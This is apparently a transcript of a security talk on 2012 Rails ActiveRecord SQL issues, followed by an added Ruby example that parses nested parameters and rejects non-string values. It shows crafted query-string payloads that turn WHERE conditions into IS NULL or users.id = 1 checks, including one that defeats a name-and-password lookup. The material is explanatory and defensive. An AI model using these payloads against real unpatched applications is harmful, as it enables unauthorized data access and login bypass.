"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Programming
Transcript
Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661

CVE-2012-2660
Allows an unexpected "IS NULL" in queries. Affects Rails 2.x and 3.x.

ActiveRecord Query:
unless params[:name].nil?
  @user = User.where(:name => params[:name])
end

Query Parameters:
?name[]
{"name"=>[nil]}

ActiveRecord Query (with the parameter substituted in; note that [nil].nil? is false, so the guard does not fire):
unless [nil].nil?
  @user = User.where(:name => [nil])
end

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys. Affects Rails 3.x.

ActiveRecord Query:
User.where(:name => params[:name])

ActiveRecord Query (the symbol key is handled like the dotted string key "users.name"):
User.where("users.name" => params[:name])

Query Parameters:
?name[users.id]=1
{"name"=>{"users.id"=>"1"}}

ActiveRecord Query (with the parameter substituted in):
User.where(:name => {"users.id" => "1"})

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values. Affects Rails 2.3.x and 3.x.

ActiveRecord Query:
User.where(:name => params[:name], :password => params[:password])

Query Parameters:
?name[users][id]=1&password[users][id]=1
{"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (with the parameters substituted in):
User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
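All three slides turn on the same thing: the query-string parser hands the controller an Array or a Hash where the code expected a String, and that structure flows straight into where(). The example below is added here and is not from the deck or from Rails. It re-implements just enough Rack-style nested-key parsing (an assumption: it covers the "name[]", "name[users.id]" and "name[users][id]" shapes shown above, not every Rack rule) to reproduce the three parameter hashes, then shows the defender-side check: coerce each value used in a column condition to a plain String before ActiveRecord ever sees it. The helper names parse_nested_query, classify, scalar_param and scalar_conditions are hypothetical; keys are plain strings rather than Rails' indifferent-access hash.

```ruby
require 'cgi'

# Minimal Rack-style nested query parser (assumption: matches Rack for the key
# shapes discussed in the deck; "[]" is only supported as the last segment).
def parse_nested_query(qs)
  params = {}
  qs.sub(/\A\?/, '').split('&').each do |pair|
    raw_key, raw_value = pair.split('=', 2)
    key   = CGI.unescape(raw_key.to_s)
    value = raw_value && CGI.unescape(raw_value)   # "?name[]" has no "=" -> nil
    m = key.match(/\A([^\[]+)((?:\[[^\]]*\])*)\z/) or next
    subkeys = m[2].scan(/\[([^\]]*)\]/).flatten     # "[users][id]" -> ["users", "id"]
    assign(params, m[1], subkeys, value)
  end
  params
end

def assign(container, key, subkeys, value)
  if subkeys.empty?
    container[key] = value                          # name=bob  -> "bob"
  elsif subkeys.first == ''
    (container[key] ||= []) << value                # name[]    -> [nil]
  else
    assign(container[key] ||= {}, subkeys.first, subkeys.drop(1), value)  # name[x]=1 -> {"x"=>"1"}
  end
end

# Shape of a parameter value as it would reach a controller.
#   :scalar -> what the code on the slides expects
#   :array  -> the CVE-2012-2660 shape (IS NULL / IN (...))
#   :hash   -> the CVE-2012-2661 and nested-hash shapes (column override)
def classify(value)
  case value
  when String, nil then :scalar
  when Array       then :array
  when Hash        then :hash
  else                  :other
  end
end

# Defensive coercion: only a String survives; arrays and hashes become nil, so
# a guard like `unless scalar_param(params['name']).nil?` is not bypassed by ?name[].
def scalar_param(value)
  value.is_a?(String) ? value : nil
end

# Build the conditions hash for where() from an allow-list of columns, refusing
# any value that is not a scalar instead of passing it through.
def scalar_conditions(params, allowed_columns)
  allowed_columns.each_with_object({}) do |col, conds|
    value = params[col]
    next if value.nil?
    shape = classify(value)
    raise ArgumentError, "#{col}: expected a scalar, got #{shape}" unless shape == :scalar
    conds[col] = value
  end
end

if __FILE__ == $0
  # Constructed inputs: the three payload shapes from the slides plus a benign one.
  ['?name[]', '?name[users.id]=1', '?name[users][id]=1&password[users][id]=1', '?name=bob'].each do |qs|
    params = parse_nested_query(qs)
    puts "#{qs.ljust(42)} -> #{params.inspect}  (name is #{classify(params['name'])})"
    begin
      puts "  where(#{scalar_conditions(params, %w[name password]).inspect})"
    rescue ArgumentError => e
      puts "  rejected: #{e.message}"
    end
  end
end
```

The point of scalar_conditions is the allow-list plus the type check together: the column names come from the code, never from the request, and the values are forced to be strings, so neither the dotted key nor the nested hash can turn a value into a column reference.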